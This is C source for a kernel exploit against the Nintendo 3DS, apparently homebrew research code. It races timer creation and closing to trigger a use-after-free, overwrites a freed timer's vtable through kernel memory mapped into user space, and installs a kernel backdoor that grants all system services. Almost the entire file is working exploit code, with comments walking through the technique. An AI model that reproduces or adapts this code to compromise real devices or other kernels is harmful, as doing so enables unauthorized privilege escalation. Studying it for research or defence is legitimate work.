/* Exploit-related code. Ned Williamson 2016 */
#include <3ds.h>
#include <stdio.h>
#include "backdoor.h"
#include "exploit.h"
#include "timer.h"
#include "util.h"

#define TIMER2_NEXT_KERNEL 0xe281100c

static u32 fptrs[16] = {
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
  (u32)&install_kernel_backdoor,
};

#define LINEAR_KERN_TO_USER(addr) ((addr) - 0xE0000000 + 0x14000000)

static bool check_control() {
  Handle timer, timer2;
  Result res;

  vu32 *timer2_next_user = (u32 *)LINEAR_KERN_TO_USER(TIMER2_NEXT_KERNEL);

  u32 orig_value = *timer2_next_user;

  res = svcCreateTimer(&timer, PULSE_EVENT);
  if (res < 0) {
    printf("check_control: couldn't create timer1\n");
    return false;
  }

  res = svcCreateTimer(&timer2, PULSE_EVENT);
  if (res < 0) {
    printf("check_control: couldn't create timer2\n");
    svcCloseHandle(timer);
    return false;
  }

  u32 current_value = *timer2_next_user;

  /* if nothing changed, then we didn't win the race */
  if (orig_value == current_value) {
    res = svcCloseHandle(timer2);
    if (res < 0) {
      printf("check_control: warning: couldn't destroy timer2\n");
    }

    res = svcCloseHandle(timer);
    if (res < 0) {
      printf("check_control: warning: couldn't destroy timer\n");
    }

    return false;
  }

  printf("we won!\n");
  //wait_for_user();

  /* we won the race! replace vtable with our own */
  *timer2_next_user = (u32)&fptrs;

  /* this installs the backdoor */
  svcCancelTimer(timer2);

  /* put vtable back so we can free normally */
  *timer2_next_user = current_value;

  res = svcCloseHandle(timer2);
  if (res < 0) {
    printf("check_control: warning: couldn't destroy timer2\n");
  }

  res = svcCloseHandle(timer);
  if (res < 0) {
    printf("check_control: warning: couldn't destroy timer\n");
  }

  /* put original vtable back */
  printf("backdoor_installed: %d\n", backdoor_installed);
  //wait_for_user();

  if (!backdoor_installed) {
    return false;
  }
  

  /* TODO restore timer free pointers in here */

  return true;
}

bool initialize_timer_state() {
  Result res;
  Handle timer;

  /* alloced: timer1 */
  res = svcCreateTimer(&timer, 0);
  if (res < 0) {
    printf("failed to create timer1\n");
    return false;
  }

  /* alloced: timer1, timer2 */
  Handle timer2;
  res = svcCreateTimer(&timer2, 2);
  if (res < 0) {
    printf("failed to create timer2\n");
    svcCloseHandle(timer);
    return false;
  }

  svcCancelTimer(timer2);

  if (!set_timer(timer2, 0xaaa00000)) {
    printf("set_timer_test: set_timer failed\n");
    svcCloseHandle(timer2);
    svcCloseHandle(timer);
    return false;
  }

  // goal: 0xFFF1B65C
  if (!set_timer(timer2, 0xaaa5e774)) {
    printf("set_timer_test: set_timer failed\n");
    svcCloseHandle(timer2);
    svcCloseHandle(timer);
    return false;
  }

  if (mybackdoor_installed()) {
    u64 initial = 0;
    if (!get_timer_value(timer2, &initial, NULL)) {
      printf("set_timer_test: get_timer_value failed\n");
      svcCloseHandle(timer2);
      svcCloseHandle(timer);
      return false;
    }

    u32 target = (u32)((initial) >> 32);
    if (target != 0xFFF1B65C) {
      printf("warning: got bad target: %lx\n", target);
    } else {
      printf("got good target!\n");
    }
    //wait_for_user();
  }

  /* alloced: timer1 */
  /* freed: timer2 -> ... */
  res = svcCloseHandle(timer2);
  if (res < 0) {
    printf("failed to close timer handle\n");
    return false;
  }

  /* freed: timer1 -> timer2 -> ... */
  res = svcCloseHandle(timer);
  if (res < 0) {
    printf("failed to close timer handle\n");
    return false;
  }
  return true;
}

/* returns true if attempt succeeded */
/* call this after initialize_state */
bool try_once() {
  Handle timer;
  /* each round, we allocate timer1, run the pulse timer,
   * then free it. if it frees while pulsing a UAF occurs
   * and we have &timer2 where &timer1->vtable should be.
   * so we get a vtable call where the fields from timer2
   * were controlled
   *
   * then we get (timer2+0x3c)(timer2, ...)
   * so return to any kernel function that writes an error to R0
   * 0xE....... which is R/W shared with userspace 0x2.......
   * this gives us *timer2 = userspace_addr;
   * and the timer object free list is timer1 -> timer2 -> ...
   * so we need to alloc two times to get timer2, then we should
   * be able to overwrite its vtable as we please using the shared
   * memory
   */

  svcCreateTimer(&timer, PULSE_EVENT);
  // set timer with a quick first pulse, long second pulse
  // 6000 found using random trial and error. there might be
  // a better value
  svcSetTimer(timer, 8000, 0x1000000000);
  // hope the pulse race happens
  svcCloseHandle(timer);
  svcSleepThread(1000000);

  /* reallocate the freed timer and clear it from the scheduler */
  svcCreateTimer(&timer, PULSE_EVENT);
  svcCancelTimer(timer);
  svcCloseHandle(timer);

  // printf("after race attempt (backdoored)\n");
  // print_array_wait("timer1", timer1_addr, 8);
  // print_array_wait("timer2", timer2_addr, 8);

  /* free list: timer1_addr -> timer2_addr -> user_vtable -> ... */

  return check_control();
}

bool k11_exploit() {
  if (!initialize_timer_state()) {
    printf("k11_exploit: couldn't initialize timer state\n");
    return false;
  }

  for (int i = 0; i < 0x1000; i++) {
    if ((i % 0x100) == 0) {
      printf("beginning attempt 0x%x\n", i);
    }
    if (try_once()) {
	  initsrv_allservices();
      return true;
    }
  }
  return false;
}
